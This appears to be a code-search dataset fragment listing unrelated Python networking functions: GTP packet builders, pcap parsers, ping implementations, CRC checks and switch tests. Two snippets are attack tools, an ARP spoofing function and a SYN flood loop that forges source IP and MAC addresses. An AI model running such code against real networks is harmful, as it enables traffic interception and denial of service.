'Ether()/IP()/UDP(%sdport=2152)/GTP_U_Header(teid=%s)/IPv6()/UDP()/Raw(\"X\"*20)' % (chk, teid),\n 'IPV4/GTPU/IPV6/TCP': 'Ether()/IP()/UDP(%sdport=2152)/GTP_U_Header(teid=%s)/IPv6()/TCP()/Raw(\"X\"*20)' % (chk, teid),\n 'IPV4/GTPU/IPV6/SCTP': 
'Ether()/IP()/UDP(%sdport=2152)/GTP_U_Header(teid=%s)/IPv6()/SCTP()/Raw(\"X\"*20)' % (chk, teid),\n 'IPV4/GTPU/IPV6/ICMP': 'Ether()/IP()/UDP(%sdport=2152)/GTP_U_Header(teid=%s)/IPv6(nh=58)/ICMP()/Raw(\"X\"*20)' % (chk, teid),\n 'IPV6/GTPU/IPV6/FRAG': 'Ether()/IPv6()/UDP(%sdport=2152)/GTP_U_Header(teid=%s)/IPv6()/IPv6ExtHdrFragment()/Raw(\"X\"*20)' % (chk, teid),\n 'IPV6/GTPU/IPV6': 'Ether()/IPv6()/UDP(%sdport=2152)/GTP_U_Header(teid=%s)/IPv6()/Raw(\"X\"*20)' % (chk, teid),\n 'IPV6/GTPU/IPV6/UDP': 'Ether()/IPv6()/UDP(%sdport=2152)/GTP_U_Header(teid=%s)/IPv6()/UDP()/Raw(\"X\"*20)' % (chk, teid),\n 'IPV6/GTPU/IPV6/TCP': 'Ether()/IPv6()/UDP(%sdport=2152)/GTP_U_Header(teid=%s)/IPv6()/TCP()/Raw(\"X\"*20)' % (chk, teid),\n 'IPV6/GTPU/IPV6/SCTP': 'Ether()/IPv6()/UDP(%sdport=2152)/GTP_U_Header(teid=%s)/IPv6()/SCTP()/Raw(\"X\"*20)' % (chk, teid),\n 'IPV6/GTPU/IPV6/ICMP': 'Ether()/IPv6()/UDP(%sdport=2152)/GTP_U_Header(teid=%s)/IPv6(nh=58)/ICMP()/Raw(\"X\"*20)' % (chk, teid)}\n\n if match_opt == 'matched':\n if tunnel_pkt is 'gtpc' and inner_L3 is None:\n pkts = pkts_gtpc_pay\n if tunnel_pkt is 'gtpu' and inner_L3 is None:\n pkts = pkts_gtpu_pay\n if tunnel_pkt is 'gtpu' and inner_L3 is 'ipv4':\n pkts = pkts_gtpu_ipv4\n if tunnel_pkt is 'gtpu' and inner_L3 is 'ipv6':\n pkts = pkts_gtpu_ipv6\n\n if match_opt == 'not matched':\n if type is 'fdir':\n if tunnel_pkt is 'gtpc' and inner_L3 is None:\n pkts = dict(\n pkts_gtpu_pay.items() +\n pkts_gtpu_ipv4.items() +\n pkts_gtpu_ipv6.items())\n if tunnel_pkt is 'gtpu' and inner_L3 is None:\n pkts = dict(\n pkts_gtpc_pay.items() +\n pkts_gtpu_ipv4.items() +\n pkts_gtpu_ipv6.items())\n if tunnel_pkt is 'gtpu' and inner_L3 is 'ipv4':\n pkts = dict(\n pkts_gtpc_pay.items() +\n pkts_gtpu_pay.items() +\n pkts_gtpu_ipv6.items())\n if tunnel_pkt is 'gtpu' and inner_L3 is 'ipv6':\n pkts = dict(\n pkts_gtpc_pay.items() +\n pkts_gtpu_pay.items() +\n pkts_gtpu_ipv4.items())\n if type is 'clfter':\n if tunnel_pkt is 'gtpc':\n pkts = dict(\n pkts_gtpu_pay.items() +\n pkts_gtpu_ipv4.items() +\n pkts_gtpu_ipv6.items())\n if tunnel_pkt is 'gtpu':\n pkts = pkts_gtpc_pay\n return pkts", "def hmVerifyMsgCRCOK(destination, protocol, source, expectedFunction, expectedLength, datal) :\r\n badresponse = 0\r\n if protocol == constants.HMV3_ID:\r\n checksum = datal[len(datal)-2:]\r\n rxmsg = datal[:len(datal)-2]\r\n crc = crc16() # Initialises the CRC\r\n expectedchecksum = crc.run(rxmsg)\r\n if expectedchecksum == checksum:\r\n print(\"CRC is correct\")\r\n else:\r\n print(\"CRC is INCORRECT\")\r\n s = \"Incorrect CRC: %s Expected: %s \\n\" % (datal, expectedchecksum)\r\n sys.stderr.write(s)\r\n badresponse += 1\r\n\r\n # Check the response\r\n dest_addr = datal[0]\r\n frame_len_l = datal[1]\r\n frame_len_h = datal[2]\r\n frame_len = (frame_len_h << 8) | frame_len_l\r\n source_addr = datal[3]\r\n func_code = datal[4]\r\n\r\n\r\n\r\n if (dest_addr != 129 and dest_addr != 160):\r\n print(\"dest_addr is ILLEGAL\")\r\n s = \"%s : Controller %s : Illegal Dest Addr: %s\\n\" % (localtime, loop, dest_addr)\r\n sys.stderr.write(s)\r\n badresponse += 1\r\n\r\n if (dest_addr != destination):\r\n print(\"dest_addr is INCORRECT\")\r\n s = \"%s : Controller %s : Incorrect Dest Addr: %s\\n\" % (localtime, loop, dest_addr)\r\n sys.stderr.write(s)\r\n badresponse += 1\r\n\r\n if (source_addr < 1 or source_addr > 32):\r\n print(\"source_addr is ILLEGAL\")\r\n s = \"%s : Controller %s : Illegal Src Addr: %s\\n\" % (localtime, loop, source_addr)\r\n sys.stderr.write(s)\r\n badresponse += 1\r\n\r\n if 
(source_addr != source):\r\n print(\"source addr is INCORRECT\")\r\n s = \"%s : Controller %s : Incorrect Src Addr: %s\\n\" % (localtime, loop, source_addr)\r\n sys.stderr.write(s)\r\n badresponse += 1\r\n\r\n if (func_code != constants.FUNC_WRITE and func_code != constants.FUNC_READ):\r\n print(\"Func Code is UNKNWON\")\r\n s = \"%s : Controller %s : Unknown Func Code: %s\\n\" % (localtime, loop, func_code)\r\n sys.stderr.write(s)\r\n badresponse += 1\r\n\r\n if (func_code != expectedFunction):\r\n print(\"Func Code is UNEXPECTED\")\r\n s = \"%s : Controller %s : Unexpected Func Code: %s\\n\" % (localtime, loop, func_code)\r\n sys.stderr.write(s)\r\n badresponse += 1\r\n\r\n if (func_code == constants.FUNC_WRITE and frame_len != 7):\r\n # Reply to Write is always 7 long\r\n print(\"response length is INCORRECT\")\r\n s = \"%s : Controller %s : Incorrect length: %s\\n\" % (localtime, loop, frame_len)\r\n sys.stderr.write(s)\r\n badresponse += 1\r\n\r\n if (len(datal) != frame_len):\r\n print(\"response length MISMATCHES header\")\r\n s = \"%s : Controller %s : Mismatch length: %s %s\\n\" % (localtime, loop, len(datal), frame_len)\r\n sys.stderr.write(s)\r\n badresponse += 1\r\n\r\n \"\"\"if (func_code == constants.FUNC_READ and expectedLength !=len(datal) ):\r\n # Read response length is wrong\r\n print(\"response length not EXPECTED value\")\r\n print(len(datal))\r\n print(datal)\r\n s = \"%s : Controller %s : Incorrect length: %s\\n\" % (localtime, loop, frame_len)\r\n sys.stderr.write(s)\r\n badresponse += 1\r\n\"\"\"\r\n if (badresponse == 0):\r\n return True\r\n else:\r\n return False\r\n\r\n else:\r\n assert 0, \"Un-supported protocol found %s\" % protocol", "def parse_packets(pcap):\n # For each packet in the pcap process the contents\n flow_Info = []\n times = 0\n for timestamp, buf in pcap:\n times += 1\n tmp_flow_Info = {}\n\n # Unpack the Ethernet frame (mac src/dst, ethertype)\n eth = dpkt.ethernet.Ethernet(buf)\n # Unpack the data whthin the Ethernet frame (the IP packet)\n ip = eth.data\n\n # if protocol(ip.p) is not UDP(17) ,skip this packet\n if ip.p != 17:\n continue\n\n udp = ip.data\n # Temp_data = parse_data(eth.data.udp.data)\n # Filter CoAP by port\n if(udp.sport != 5683 or udp.dport != 5683):\n continue\n\n str_udp_data = parse_data(eth.data.udp.data)\n # skip packets of Non_confirmable\n if str_udp_data[0] == '5': \n continue\n\n cycle = 0\n index = 0\n Udp_data = []\n \n len_str_udp_data = len(str_udp_data)\n while cycle < (len_str_udp_data//3+1):\n # Udp_data.append(int('0x'+Str_Udp_data[index:index + 2], 16))\n Udp_data.append(int('0x' + str_udp_data[index:index + 2], 16))\n cycle += 1\n index += 3\n tmp_flow_Info['udp_data'] = (Udp_data)\n\n # confirmable or ack\n tmp_flow_Info['Coap_type'] = str_udp_data[0]\n #print(str_udp_data) \n \n # skip space and get \"Message ID\" \n HexMide = str_udp_data[6:8] + str_udp_data[9:11]\n tmp_flow_Info['Mid'] = int('0x'+HexMide, 16)\n\n tmp_flow_Info['Timestamp'] = str(datetime.datetime.fromtimestamp(timestamp))\n # print('Ethernet Frame: ', mac_addr(eth.src), mac_addr(eth.dst), eth.type)\n tmp_flow_Info['src'] = inet_to_str(ip.src)\n tmp_flow_Info['dst'] = inet_to_str(ip.dst)\n\n tmp_flow_Info['sport'] = udp.sport\n tmp_flow_Info['dport'] = udp.dport\n flow_Info.append(tmp_flow_Info)\n\n return flow_Info", "def scapy_create_send_ARP(self, ipdst):\n ether_header = self.define_ethernet_header()\n arp_header = self.define_arp_header(pdst=ipdst)\n sendp(ether_header/arp_header, count = DEFAULT_PACKET_DURATION,\\\n 
iface=self.sourceiface)", "def aprs_msg(src,dst,via,addr,msgtext):\n\n to = addr.ljust(9)[:9]\n msg = src + '>' + dst\n if via:\n msg += ',' + via\n msg += '::' + to + ':' + msgtext\n return msg", "def send_one_ping(self, current_socket):\n from struct import pack\n from sys import byteorder\n\n def calculate_checksum(source_string):\n \"\"\"A port of the functionality of in_cksum() from ping.c\n Ideally this would act on the string as a series of 16-bit ints (host\n packed), but this works.\n Network data is big-endian, hosts are typically little-endian\n \"\"\"\n countTo = (int(len(source_string) / 2)) * 2\n sum = 0\n count = 0\n\n # Handle bytes in pairs (decoding as short ints)\n loByte = 0\n hiByte = 0\n while count < countTo:\n if (byteorder == \"little\"):\n loByte = source_string[count]\n hiByte = source_string[count + 1]\n else:\n loByte = source_string[count + 1]\n hiByte = source_string[count]\n sum = sum + (ord(hiByte) * 256 + ord(loByte))\n count += 2\n\n # Handle last byte if applicable (odd-number of bytes)\n # Endianness should be irrelevant in this case\n if countTo < len(source_string): # Check for odd length\n loByte = source_string[len(source_string) - 1]\n sum += ord(loByte)\n\n sum &= 0xffffffff # Truncate sum to 32 bits (a variance from ping.c, which\n # uses signed ints, but overflow is unlikely in ping)\n\n sum = (sum >> 16) + (sum & 0xffff) # Add high 16 bits to low 16 bits\n sum += (sum >> 16) # Add carry from above (if any)\n answer = ~sum & 0xffff # Invert and truncate to 16 bits\n answer = socket.htons(answer)\n\n return answer\n\n ICMP_ECHO = 8 # Echo request (per RFC792)\n\n # Header is type (8), code (8), checksum (16), id (16), sequence (16)\n checksum = 0\n\n # Make a dummy header with a 0 checksum.\n header = pack(\n \"!BBHHH\", ICMP_ECHO, 0, checksum, self.own_id, self.seq_number\n )\n\n padBytes = []\n startVal = 0x42\n for i in range(startVal, startVal + (self.packet_size)):\n padBytes += [(i & 0xff)] # Keep chars in the 0-255 range\n data = bytes(padBytes)\n\n # Calculate the checksum on the data and the dummy header.\n checksum = calculate_checksum(header + data) # Checksum is in network order\n\n # Now that we have the right checksum, we put that in. 
It's just easier\n # to make up a new header than to stuff it into the dummy.\n header = pack(\n \"!BBHHH\", ICMP_ECHO, 0, checksum, self.own_id, self.seq_number\n )\n\n packet = header + data\n\n send_time = self.timer()\n\n try:\n current_socket.sendto(packet, (self.destination, 1)) # Port number is irrelevant for ICMP\n except socket.error as e:\n current_socket.close()\n return\n\n return send_time", "def check_ip_fwd(duthosts, all_cfg_facts, nbrhosts, tbinfo):\n for porttype in [\"ethernet\", \"portchannel\"]:\n for version in [4, 6]:\n\n ports = pick_ports(duthosts, all_cfg_facts, nbrhosts, tbinfo, port_type_a=porttype, version=version)\n\n for ttl, size in [(2, 64), (1, 1450)]:\n # local interfaces\n check_packet(sonic_ping, ports, 'portB', 'portA', size=size, ttl=ttl, ttl_change=0)\n\n # local neighbors\n check_packet(sonic_ping, ports, 'portA', 'portA',\n dst_ip_fld='nbr_ip', size=size, ttl=ttl, ttl_change=0)\n\n vm_host_to_A = nbrhosts[ports['portA']['nbr_vm']]['host']\n\n check_packet(eos_ping, ports, 'portD', 'portA', dst_ip_fld='my_lb4096_ip', src_ip_fld='nbr_lb',\n dev=vm_host_to_A, size=size, ttl=ttl)\n\n # loopbacks\n check_packet(sonic_ping, ports, 'portA', 'portA', dst_ip_fld='nbr_lb', size=size, ttl=ttl, ttl_change=0)\n\n # inband\n check_packet(sonic_ping, ports, 'portA', 'portA', src_ip_fld='inband', size=size, ttl=ttl, ttl_change=0)\n\n # DUT loopback\n # these don't decrement ttl\n check_packet(sonic_ping, ports, 'portA', 'portA', src_ip_fld='my_lb_ip', dst_ip_fld='my_ip', size=size,\n ttl=ttl, ttl_change=0)\n check_packet(sonic_ping, ports, 'portA', 'portA', src_ip_fld='my_lb_ip', dst_ip_fld='nbr_ip', size=size,\n ttl=ttl, ttl_change=0)\n check_packet(sonic_ping, ports, 'portA', 'portA', src_ip_fld='my_lb_ip', dst_ip_fld='nbr_lb', size=size,\n ttl=ttl, ttl_change=0)\n\n vm_host_to_A = nbrhosts[ports['portA']['nbr_vm']]['host']\n check_packet(eos_ping, ports, 'portA', 'portA', dst_ip_fld='my_lb4096_ip', src_ip_fld='nbr_lb',\n dev=vm_host_to_A, size=size, ttl=ttl, ttl_change=0)\n\n # end to end\n vm_host_to_A = nbrhosts[ports['portA']['nbr_vm']]['host']\n check_packet(eos_ping, ports, 'portB', 'portA', dst_ip_fld='nbr_lb', src_ip_fld='nbr_lb',\n dev=vm_host_to_A, size=size, ttl=ttl)\n check_packet(eos_ping, ports, 'portC', 'portA', dst_ip_fld='nbr_lb', src_ip_fld='nbr_lb',\n dev=vm_host_to_A, size=size, ttl=ttl)\n check_packet(eos_ping, ports, 'portD', 'portA', dst_ip_fld='nbr_lb', src_ip_fld='nbr_lb',\n dev=vm_host_to_A, size=size, ttl=ttl)", "def translate_control_packet(self, multicast_packet):", "def send_packets_to_IPv4_targets_customized(self):\n pktcount = self.pktcount\n # If user does not specify pktcount, need calculate it based on\n # duration and interval\n if (pktcount == 0):\n pktcount = int(self.duration*1000/self.interval)\n\n # If destmac not specified, then use default value\n # If source_address is a range, then calculate source mac based on IP\n\n dest_array = self.destination_address.split('-')\n start = dest_array[0]\n end = start\n if (len(dest_array) > 1):\n end = dest_array[1]\n print(\"Send %s packets to %s from source %s\" % (self.protocol, \\\n self.destination_address, self.source_address))\n\n source_array = self.source_address.split('-')\n sstartip = source_array[0]\n sendip = sstartip\n if (len(source_array) > 1):\n sendip = source_array[1]\n for sip in range(ip2long(sstartip), ip2long(sendip)+1):\n sourceip = long2ip(sip)\n sourcemac = None\n if (len(source_array) > 1):\n sourcemac = gen_mac(sourceip)\n else:\n sourcemac = 
self.sourcemac\n destmac = self.destmac\n for count in range(0, pktcount):\n for i in range (ip2long(start), ip2long(end)+1):\n current_dest = long2ip(i)\n if self.protocol == \"icmp\":\n self.scapy_create_send_ICMP_customized(current_dest,\\\n sourceip, True, destmac, sourcemac)\n elif self.protocol == \"arp\":\n self.scapy_create_send_ARP_customized(current_dest,\\\n sourceip, sourcemac)\n elif self.protocol in ['tcp', 'udp']:\n self.scapy_create_send_layer4(current_dest, sourceip, \\\n self.protocol, destmac, sourcemac, self.payload)\n # Sleep between sending packets\n time.sleep(self.interval/1000.0)", "def compute_tcp_acks_retrans(pcap_filepath, connections, inverse_conns, ts_syn_timeout=6.0, ts_timeout=3600.0):\n print(\"Computing TCP ack sizes for\", pcap_filepath)\n nb_acks = {co.C2S: {}, co.S2C: {}}\n acks = {}\n # Avoid processing packets that do not belong to any analyzed TCP connection\n black_list = set()\n pcap_file = open(pcap_filepath)\n pcap = dpkt.pcap.Reader(pcap_file)\n count = 0\n try:\n for ts, buf in pcap:\n ts_delta = get_ts_delta(ts)\n count += 1\n if count % 100000 == 0:\n print(count)\n # Check if linux cooked capture\n if pcap.datalink() == dpkt.pcap.DLT_LINUX_SLL:\n eth = dpkt.sll.SLL(buf)\n else:\n eth = dpkt.ethernet.Ethernet(buf)\n if type(eth.data) == dpkt.ip.IP or type(eth.data) == dpkt.ip6.IP6:\n ip = eth.data\n if type(ip.data) == dpkt.tcp.TCP:\n tcp = ip.data\n fin_flag = (tcp.flags & dpkt.tcp.TH_FIN) != 0\n syn_flag = (tcp.flags & dpkt.tcp.TH_SYN) != 0\n rst_flag = (tcp.flags & dpkt.tcp.TH_RST) != 0\n ack_flag = (tcp.flags & dpkt.tcp.TH_ACK) != 0\n\n saddr, daddr, sport, dport = get_ips_and_ports(eth, ip, tcp)\n if syn_flag and not ack_flag and not fin_flag and not rst_flag:\n process_first_syn(ts_delta, acks, nb_acks, connections, tcp, ip, saddr, daddr, sport, dport, black_list, inverse_conns,\n ts_syn_timeout, ts_timeout)\n\n elif (saddr, sport, daddr, dport) in black_list:\n continue\n\n elif syn_flag and ack_flag and not fin_flag and not rst_flag:\n process_syn_ack(ts_delta, acks, nb_acks, connections, tcp, saddr, ip, daddr, sport, dport, black_list, inverse_conns,\n ts_syn_timeout, ts_timeout)\n\n elif not syn_flag and not rst_flag and ack_flag:\n if (saddr, sport, daddr, dport) in acks:\n process_pkt_from_client(ts_delta, acks, nb_acks, connections, tcp, ip, saddr, daddr, sport, dport, fin_flag)\n\n elif (daddr, dport, saddr, sport) in acks:\n process_pkt_from_server(ts_delta, acks, nb_acks, connections, tcp, ip, saddr, daddr, sport, dport, fin_flag)\n else:\n # Silently ignore those packets\n # print(saddr, sport, daddr, dport, \"haven't seen beginning...\")\n continue\n\n except dpkt.NeedData as e:\n print(e, \": trying to continue...\", file=sys.stderr)\n finally:\n pcap_file.close()\n\n return nb_acks", "def receive_ping(my_socket, ID, timeout):\n start_time = timeout\n while True:\n start_select = time.clock()\n # select.select(rlist, wlist, xlist[, timeout])\n # wait until ready for read / write / exceptional condition\n # The return value is a triple of lists\n what_ready = select.select([my_socket], [], [], start_time)\n how_long = (time.clock() - start_select)\n if what_ready[0] == []: #timeout\n return\n\n time_received = time.clock()\n # socket.recvfrom(bufsize[, flags])\n # The return value is a pair (string, address)\n rec_packet, addr = my_socket.recvfrom(1024)\n icmp_header = rec_packet[20 : 28]\n ip_type, code, checksum, packet_ID, sequence = struct.unpack(\"bbHHh\", icmp_header)\n if ip_type != 8 and packet_ID == ID: # ip_type 
should be 0\n byte_in_double = struct.calcsize(\"d\")\n time_sent = struct.unpack(\"d\", rec_packet[28 : 28 + byte_in_double])[0]\n return time_received - time_sent\n\n start_time = start_time - how_long\n if start_time <= 0:\n return", "def spoof(target_ip, spoof_ip):\n arp_answer = scapy.ARP(\n op=2,\n pdst=target_ip,\n hwdst=get_mac(target_ip),\n psrc=spoof_ip\n )\n scapy.send(arp_answer, verbose=False)", "def handle_icmp(pkt, packets, i, start_point):\r\n icmp_type = int(pkt[start_point:start_point+2], 16)\r\n start_point = start_point + 2\r\n icmp_code = int(pkt[start_point:start_point+2], 16)\r\n start_point = start_point + 2\r\n icmp_checksum = pkt[start_point:start_point+4]\r\n packets[i][2].append(icmp_type)\r\n packets[i][2].append(icmp_code)\r\n packets[i][2].append(icmp_checksum)\r\n return packets", "def icmp_ping(ip_addr, timeout = 6, count = 1024):\n for i in range(count):\n print('Ping wait:')\n try:\n delay = ping_wait(ip_addr, timeout)\n except socket.gaierror as e:\n print('Failed. (socket error: %s)' % e[1])\n break\n\n if delay == None:\n print('Failed. (timeout within %s second.)' % timeout)\n else:\n print('get ICMP in %0.4f ms' % (delay * 1000))", "def parse_ICMP_Echo(timestamp, packet):\n eth = dpkt.ethernet.Ethernet(packet)\n\n # Make sure IPv4 is next protocol\n if isinstance(eth.data, dpkt.ip.IP):\n ip = eth.data\n # Make sure ICMP is next protocol\n if isinstance(ip.data, dpkt.icmp.ICMP):\n icmp = ip.data\n # Make sure ICMP Echo is payload\n if isinstance(icmp.data, dpkt.icmp.ICMP.Echo):\n echo = icmp.data\n\n if icmp.type == dpkt.icmp.ICMP_ECHO:\n echo_type_str = 'request'\n elif icmp.type == dpkt.icmp.ICMP_ECHOREPLY:\n echo_type_str = 'reply'\n else:\n return False\n\n ip_src = socket.inet_ntoa(ip.src)\n ip_dst = socket.inet_ntoa(ip.dst)\n\n print('{:.6f} '.format(timestamp), end='')\n print('{} > {}: '.format(ip_src, ip_dst), end='')\n print('ICMP echo {}, id {}, seq {}, length {}'\n .format(echo_type_str, echo.id, echo.seq, len(echo.data)))\n return True\n\n return False", "def sniff_online(args):\n print('viewer: listening on ' + args.interface)\n\n try:\n sniffer = pcapy.open_live(args.interface, 65536, 1, 1)\n sniffer.setfilter('icmp')\n except Exception as e:\n print(e)\n sys.exit(-1)\n\n if not args.count:\n count = True\n else:\n count = args.count\n\n while count:\n (header, packet) = sniffer.next()\n if header:\n tts = header.getts()\n ret = parse_ICMP_Echo(tts[0] + tts[1] / 1000000, packet)\n\n if ret and args.count:\n count -= 1", "def send_packet(self, src_packet, dest, N):\n\t\t# return a delay time\n\n\t\tnumHops = src_packet.src - dest\n\t\tif numHops < 0:\n\t\t\tnumHops = N - abs(numHops)\n\t\treturn numHops * 10e-5", "def icmp_ping(ip_addr, timeout=0.5, count=4):\n is_connect = 1\n\n for i in range(count):\n try:\n delay = ping_once(ip_addr, timeout)\n except socket.gaierror, e:\n print \"failed. (socket error: '%s')\" % e[1]\n if delay == None:\n print 'failed. 
(timeout within %s second.)' % timeout\n is_connect = 0\n else:\n pass\n result = [ip_addr, round(delay, 4), is_connect]\n return result", "def ping(dst, count = 10, timeout = 30):\t\n\tpingTimes = []\n\tlogging.debug(\"ping %s (%i times)\", dst, count)\n\tcommand = Command(['ping', '-n', '-c', str(count), dst], timeout)\n\tcommand.run()\n\t# when it's executing here, the results have been available\n\tif command.out is not None:\n\t\tpattern = \"time=([0-9]+\\.[0-9]+) ms\"\n\t\tlines = command.out.split('\\n')\n\t\tfor line in lines:\n\t\t\tpingTime = re.search(pattern, line)\n\t\t\ttry:\n\t\t\t\tpingTimes.append(float(pingTime.group(1)))\n\t\t\texcept:\n\t\t\t\tpass\n\n\t\treturn command.returncode, pingTimes", "def on_ctcp(self, raw_msg, source, msg, **kwargs):", "def verbose_ping(dest_addr, timeout = 2, count = 4):\n for i in range(count):\n logging.info(\"%s: ping %s...\" % (i, dest_addr))\n try:\n delay = do_one(dest_addr, timeout)\n except socket.gaierror as e:\n logging.error(\"failed. (socket error: '%s')\" % (e[1]))\n break\n\n if delay == None:\n logging.error(\"failed. (timeout within %ssec.)\" % (timeout))\n else:\n delay = delay * 1000\n logging.info(\"get ping in %0.4fms\" % (delay))\n logging.info('')", "def cmd_tcp_synflood(ip, interface, count, port, forgemac, forgeip, verbose):\n\n conf.verb = False\n\n if interface:\n conf.iface = interface\n\n layer2 = Ether()\n\n layer3 = IP()\n layer3.dst = ip\n\n layer4 = TCP()\n layer4.dport = port\n\n pkt = layer2 / layer3 / layer4\n\n counter = 0\n\n print(\"Please, remember to block your RST responses\", file=sys.stderr)\n\n while True:\n if forgeip:\n pkt[IP].src = \"%s.%s\" %(pkt[IP].src.rsplit('.', maxsplit=1)[0], randint(1, 254))\n if forgemac:\n pkt[Ether].src = RandMAC()\n\n pkt[TCP].sport = randint(10000, 65000)\n\n if verbose:\n print(pkt.summary())\n else:\n print('.', end='')\n sys.stdout.flush()\n\n sendp(pkt)\n counter += 1\n\n if count != 0 and counter == count:\n break\n\n return True", "def test_packet_handler_arp_reply_new_ip(self):\n packet = Ether() / ARP(op='is-at')\n arp = packet[ARP]\n\n chef = ARPChef()\n\n # Configure the ip_mac struct to think it's already seen the source.\n chef.ip_mac = {\n arp.psrc: 'old_ip',\n }\n\n dumpling = chef.packet_handler(packet)\n\n # We should have updated the ip_mac structure with the new ip address.\n assert chef.ip_mac[arp.psrc] == arp.hwsrc\n\n # Check dumpling payload, including 'notes'.\n assert dumpling == {\n 'operation': 'reply',\n 'src_hw': arp.hwsrc,\n 'src_ip': arp.psrc,\n 'dst_hw': arp.hwdst,\n 'dst_ip': arp.pdst,\n 'time': arp.time,\n 'notes': 'source device has new IP address',\n }", "def verify_tunnel_established(self, src_host, dst_host, other_host, packets=3):\n icmp_match = {'eth_type': IPV4_ETH, 'ip_proto': 1}\n self.wait_until_matching_flow(icmp_match, table_id=self._PORT_ACL_TABLE, ofa_match=False)\n tcpdump_text = self.tcpdump_helper(\n dst_host, 'icmp[icmptype] == 8', [\n # need to set static ARP as only ICMP is tunnelled.\n lambda: src_host.cmd('arp -s %s %s' % (other_host.IP(), other_host.MAC())),\n lambda: src_host.cmd('ping -c%u -t1 %s' % (packets, other_host.IP()))\n ],\n packets=1, timeout=(packets + 1),\n )\n self.wait_nonzero_packet_count_flow(\n icmp_match, table_id=self._PORT_ACL_TABLE, ofa_match=False)\n self.assertTrue(re.search(\n '%s: ICMP echo request' % other_host.IP(), tcpdump_text\n ), 'Tunnel was not established')", "def traff_from_extgwrtr(extgwrtr_ip, fipsOftargetVMs, proto='all', jumbo=0):\n traff = gbpFabTraff()\n print 'FIPs of 
Target VMs == %s' % (fipsOftargetVMs)\n # List of FIPs ExtGWRtr will ping, ping_fips should be type List\n if isinstance(fipsOftargetVMs,dict):\n ping_fips = fipsOftargetVMs.values() \n if isinstance(fipsOftargetVMs,list):\n ping_fips = fipsOftargetVMs\n if not isinstance(fipsOftargetVMs,list):\n ping_fips = [fipsOftargetVMs]\n attemptall = 1\n if proto == 'all':\n while attemptall < max_traff_attempts:\n if jumbo == 1:\n results_icmp = traff.test_regular_icmp(\n extgwrtr_ip, ping_fips, pkt_size='9000')\n else:\n results_icmp = traff.test_regular_icmp(extgwrtr_ip, ping_fips)\n results_tcp = traff.test_regular_tcp(extgwrtr_ip, ping_fips)\n if results_icmp != 1 and results_tcp != 1:\n retval = {'ICMP': results_icmp.keys(), 'TCP': results_tcp.keys()}\n elif results_icmp != 1:\n retval = {'ICMP': results_icmp.keys()}\n elif results_tcp != 1:\n retval = {'TCP': results_tcp.keys()}\n else:\n return 1\n if isinstance(retval,dict):\n print \"Wait for 10 secs before the next ICMP & TCP retry\\n\"\n sleep(10)\n attemptall += 1\n return retval\n if proto == 'icmp':\n if jumbo == 1:\n results_icmp = traff.test_regular_icmp(\n extgwrtr_ip, ping_fips, pkt_size='9000')\n else:\n results_icmp = traff.test_regular_icmp(extgwrtr_ip, ping_fips)\n attempt = 1\n while attempt < max_traff_attempts:\n if isinstance(results_icmp, dict):\n print \"Wait for 10 secs before the next ICMP retry\\n\"\n sleep(10)\n results_icmp = traff.test_regular_icmp(extgwrtr_ip, ping_fips)\n attempt += 1\n else:\n break\n if attempt == max_traff_attempts:\n return {'ICMP': results_icmp.keys()}\n if proto == 'tcp':\n results_tcp = traff.test_regular_tcp(extgwrtr_ip, ping_fips)\n retry = 1\n while retry < max_traff_attempts:\n if isinstance(results_tcp, dict):\n print \"Wait for 10 secs before the next TCP retry\\n\"\n sleep(10)\n results_tcp = traff.test_regular_tcp(extgwrtr_ip, ping_fips)\n retry += 1\n else:\n break\n if retry == max_traff_attempts:\n return {'TCP': results_tcp.keys()}", "def sniff_traffic(hs, count, timeout, recipient_type, pkt_type,\n exp_src, exp_dst, testlog):\n iface = hs.ports['eth1']\n\n # If host is NVP, sniff using a filter that checks for UDP packets\n if (\"NVP\" in recipient_type):\n packet = hs.libs.scapy.sniff2(\"iface='{}', count={}, timeout={}, \"\n \" filter='port 4789 and (!icmp or !ip6)', \"\n \" prn=lambda x:x.show()\".format(\n iface, count, timeout), True)\n parse_packet(packet, recipient_type, pkt_type,\n exp_src, exp_dst, testlog)\n # If host is AVP, sniff using a filter that checks for Ethernet packets\n elif (\"AVP\" in recipient_type):\n packet = hs.libs.scapy.sniff2(\"iface='{}', count={}, \"\n \" timeout={}, filter='!icmp or !ip6', \"\n \" prn=lambda x:x.show()\".format(\n iface, count, timeout), True)\n parse_packet(packet, recipient_type, pkt_type,\n exp_src, exp_dst, testlog)", "def send(self, data):\n print \"Attempting to send packet of size %d to %s\" % (len(data), self.hostname)\n self.sock.sendto(data, (self.dst_ip, 0))", "def test_tamper_ip(logger):\n packet = layers.packet.Packet(IP(src='127.0.0.1', dst='127.0.0.1')/TCP(sport=2222, dport=3333, seq=100, ack=100, flags=\"S\"))\n original = copy.deepcopy(packet)\n tamper = actions.tamper.TamperAction(None, field=\"src\", tamper_type=\"replace\", tamper_value=\"192.168.1.1\", tamper_proto=\"IP\")\n lpacket, rpacket = tamper.run(packet, logger)\n assert not rpacket, \"Tamper must not return right child\"\n assert lpacket, \"Tamper must give a left child\"\n assert id(lpacket) == id(packet), \"Tamper must edit in place\"\n\n # 
Confirm tamper replaced the field it was supposed to\n assert packet[IP].src == \"192.168.1.1\", \"Tamper did not replace flags.\"\n\n # Confirm tamper didn't corrupt anything in the TCP header\n assert confirm_unchanged(packet, original, TCP, [])\n\n # Confirm tamper didn't corrupt anything else in the IP header\n assert confirm_unchanged(packet, original, IP, [\"src\"])", "def get_ICMP_echo(payload_size, seq):\r\n icmp_type = 8\r\n icmp_code = 0\r\n init_checksum = 0\r\n icmp_id = random.randint(0, 0xFFFF)\r\n icmp_seq = seq\r\n _checksum = struct.pack(\"!BBHHH\", icmp_type, icmp_code, init_checksum,\r\n icmp_id, icmp_seq)\r\n\r\n payload = \"\"\r\n for i in range(payload_size):\r\n payload += 'a'\r\n payload = bytes(payload, 'utf-8')\r\n\r\n icmp_checksum = get_checksum(_checksum + payload)\r\n\r\n header = struct.pack(\"!BBHHH\", icmp_type, icmp_code, icmp_checksum,\r\n icmp_id, icmp_seq)\r\n\r\n return header + payload", "def send_error(self, conn, msg, srcif):\n message = {}\n message[SRCE], message[DEST] = ('.').join(srcif.split('.', 3)[:3]) + '.1', msg[SRCE]\n message[TYPE] = NRTE\n message[MESG] = {}\n sending_msg = json.dumps(message).encode()\n conn.sendall(sending_msg)\n return True" ]
